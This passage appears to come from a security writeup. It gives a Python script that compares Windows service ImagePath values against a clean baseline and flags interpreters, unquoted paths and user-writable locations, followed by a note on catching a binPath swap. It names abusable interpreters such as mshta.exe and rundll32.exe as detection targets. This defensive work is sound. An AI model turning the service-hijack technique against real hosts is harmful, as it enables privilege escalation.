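# Constructed known-good baseline, e.g. captured from a clean build.
BASELINE = {
    "browser": r"%SystemRoot%\System32\svchost.exe -k netsvcs",
    "Tampered": r"%SystemRoot%\System32\svchost.exe -k netsvcs",
}

INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
USER_WRITABLE_HINTS = ("\\users\\", "\\temp\\", "\\programdata\\")


def parse_reg_export(text: str) -> dict:
    """Map service name -> ImagePath from reg query style output.
    Value lines are 'Name    REG_TYPE    data' separated by four spaces."""
    services, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_LOCAL_MACHINE\\"):
            current = line.rsplit("\\", 1)[1]
            continue
        fields = re.split(r"\s{4}", line.strip(), maxsplit=2)
        if current and len(fields) == 3 and fields[0] == "ImagePath":
            services[current] = fields[2]
    return services


def executable_of(image_path: str) -> str:
    """The program part of the command line: a quoted path, or everything
    up to and including the first '.exe'."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:p.find('"', 1)]
    m = re.match(r"(.+?\.exe)", p, re.IGNORECASE)
    return m.group(1) if m else p.split()[0]


def audit(services: dict, baseline: dict) -> list:
    """Return (service, reason) findings for suspicious ImagePath values."""
    findings = []
    for name, path in services.items():
        exe = executable_of(path)
        base = PureWindowsPath(exe).name.lower()
        if name not in baseline:
            findings.append((name, "service not present in baseline"))
        elif baseline[name].lower() != path.lower():
            findings.append((name, "ImagePath differs from baseline"))
        if base in INTERPRETERS:
            findings.append((name, f"service runs an interpreter ({base})"))
        if not path.startswith('"') and " " in exe:
            findings.append((name, "unquoted ImagePath with spaces"))
        if any(h in path.lower() for h in USER_WRITABLE_HINTS):
            findings.append((name, "command line references a user-writable location"))
    return findings


def run_audit() -> list:
    return audit(parse_reg_export(SAMPLE_REG_EXPORT), BASELINE)


if __name__ == "__main__":
    for service, reason in run_audit():
        print(f"{service}: {reason}")
```

The baseline comparison is what catches the binPath swap described in the writeup: the heuristics alone would miss an attacker who points a stopped service at an innocuous-looking binary in a path they control, whereas any change to a Server Operators-editable service shows up as a diff against the clean capture.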